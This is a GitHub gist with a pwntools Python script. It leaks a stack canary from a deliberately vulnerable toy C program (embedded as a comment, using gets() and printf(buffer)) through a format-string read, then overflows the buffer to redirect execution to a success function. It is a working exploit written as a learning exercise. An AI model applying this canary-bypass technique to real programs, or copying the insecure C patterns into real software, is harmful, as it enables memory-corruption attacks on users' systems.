Skip to content

Instantly share code, notes, and snippets.

@Sinkmanu

Sinkmanu/exploit-canary.py

Created May 22, 2018 12:55
Show Gist options
  • Save Sinkmanu/0e3dead41e6b2f4d49ff13d3f6f56eb9 to your computer and use it in GitHub Desktop.
Save Sinkmanu/0e3dead41e6b2f4d49ff13d3f6f56eb9 to your computer and use it in GitHub Desktop.
Download ZIP
Exploit with stack guard bypass
Raw
exploit-canary.py
from pwn import *
'''
// File: bypass-canary.c
// $ gcc bypass-canary.c -o bypass-canary
#include <stdio.h>
#include <stdlib.h>
void doRead()
{
char buffer[28];
char test[12];
gets(buffer);
printf(buffer);
printf("\n");
gets(test);
}
void success(){
printf("Canary stack bypassed!!\n");
}
int main(int argc)
{
doRead();
}
'''
# stack canary - %13$p
context(arch = 'amd64', os = 'linux')
elf = ELF("./bypass-canary")
p = process(elf.path)
#p = gdb.debug("./bypass-canary", '''
#break main
#''')
p.sendline("%13$p")
canary_p = p.recvuntil("\x0a")
log.success("Canary: " + canary_p)
# canary offset = 56
canary = p64(int(canary_p, 16))
#p.sendline(cyclic(56) + canary + "AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
p.sendline(cyclic(56) + canary + "AAAAAAAA"+p64(0x4006d1))
log.success("Recv: " + p.recvline())
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment